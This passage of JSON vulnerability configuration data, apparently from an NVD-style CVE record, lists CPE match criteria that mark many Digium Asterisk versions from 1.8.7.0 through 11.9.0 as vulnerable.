              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "984CD6D9-4A54-4065-8401-DC555AB95425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CDE13439-4124-4BDE-A068-460BCF96419B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "3F4DC562-649E-4105-8B3E-43F02BD593FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "58F4BFC9-E02A-4121-8D34-99022AB8B45A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "9C806F87-C897-48E4-8533-A4EBC6B77078",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "08B8C143-93FF-44DD-8F61-6F4FEE977371",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "8859F234-5066-40DD-862C-0F3CCA98AFB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75962F03-EC19-4920-9FA7-2D422E6E83F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B5D0BB0E-1BB0-4F31-9C5D-DC1A069E52DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "33FE3DCE-74B5-49A4-BC18-34B22CA83947",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF2E25F3-053D-4F7D-A35D-706A401CCAA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2A153336-10C4-4C42-AC66-AC1351887EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "0C2FF4E9-2513-4022-AF80-6F44A2287D6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "43E00618-19F6-4828-818A-95C9106097B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CEC4F4AE-7BD8-437F-8838-FE564BCB7FA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2BC3B463-6B2C-42AF-BE13-50B7D63E7F05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61E7199F-EACE-431A-8ADD-B96A6FCDBC49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA7CD0E5-8E69-43B5-A5FF-8B122475CC00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2799111C-06DB-4979-8F81-A8C09D53E5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F4BEA1B2-2103-4E25-92A9-DB107D6D4AD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2AD9AFFB-F903-43DD-9C1D-4D8E83EA25C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "4F3C35F1-CBF2-4F77-AC19-574DEF2652A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75EA94FD-D16A-49BC-A418-36EFC187EC7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "A14FC2A1-29D5-49FE-92A9-D61833BF1C95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5E3C5C1E-67E9-401A-BA52-FCB32CA4473C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "501F5764-BBC2-426A-AF01-7FB477850073",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "FDB35CE5-4EDB-4949-A5E4-1BD721CCA469",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "82ED9CD2-504E-4D7B-B242-2511A7730776",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EF6E50F5-605A-4D2B-B55D-8AB251532E8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:-:*:*:*:*:*:*",
              "matchCriteriaId": "F6C796AE-95EE-4EAB-959C-1C1353C565A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EEAF3B2E-E520-4F43-ACC5-0F01A6247199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "085D4102-E2E8-496C-85B7-714FD3639BE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E0ABBB2C-19EC-4D6C-A1EA-AEF0ABA4123D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "981F3994-392D-47DB-97DA-AC15BA070A36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "94691EE6-266F-46CE-B388-0289EB39D91A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C2FD962-B1D5-41E5-884E-0C3F7F9DACE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "096E966A-878B-426F-AB40-BB476B17B969",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "852DAF2A-86F3-4D05-91DC-6A2FBC214736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7D721486-3043-4380-A73C-44B4DD0E34C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F29E2EE-B6E8-4E55-84A8-3BD0658387EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "837BF2BD-814F-4503-91DF-EE16B5A4921D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "15FCDDB3-62D8-446C-B57C-F3BBFBD13491",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "03512BDE-E441-46F6-88B7-16A2468CA199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902CAF9D-9D02-47FA-AE2E-EC1268A32BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "80AD87B5-B796-4C44-8A6D-0B22AA2903CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D87B2B3-E40B-4BF7-91E6-3B3F9CA28719",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2575F7A4-E1F1-4836-A467-076EDD8484B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBDFAFA3-A52F-4FC8-BA51-FE52D5F57DD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6085E437-87B8-4355-BDC0-A14EA4F52695",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C44D1ED-2435-4042-BF15-3D752BE0C661",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "23E4CE5C-375C-4ECB-A4D9-A5A6805E5FE0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "236D459B-ED50-4A2F-B463-D2F9DD1C7E8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9EEB00A-68B0-4CDE-B625-AB83B1D6D2F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.32.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "72195459-404F-423E-A78C-DE2A728AFDA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
